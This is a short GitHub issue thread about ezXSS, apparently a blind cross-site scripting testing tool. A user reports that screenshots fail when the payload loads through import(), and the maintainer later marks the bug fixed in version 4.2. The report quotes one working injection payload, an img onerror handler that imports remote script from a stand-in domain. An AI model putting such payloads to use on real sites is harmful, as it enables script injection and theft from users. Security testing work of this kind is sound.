ssl/ezXSS

Screenshots don't work while using import() function

bugraesk opened this issue · 3 comments

Hi,

While using the import() function to load a blind XSS script, like <img src=x onerror=import('//xss.domain')>, the html2canvas script doesn't load and we can't get the screenshot. I wonder if import() blocks that or the script has some issues? import() is very useful due to its shortness; it would be much more useful with screenshots.

Thanks!

ssl commented

I will look into this. I did not create html2canvas and it might be an issue with this library.

Thanks. When I try it standalone, it works: https://codepen.io/bugraesk/pen/zYbWRvj

ssl commented

This is now fixed in ezXSS 4.2 in this commit: e7f4c88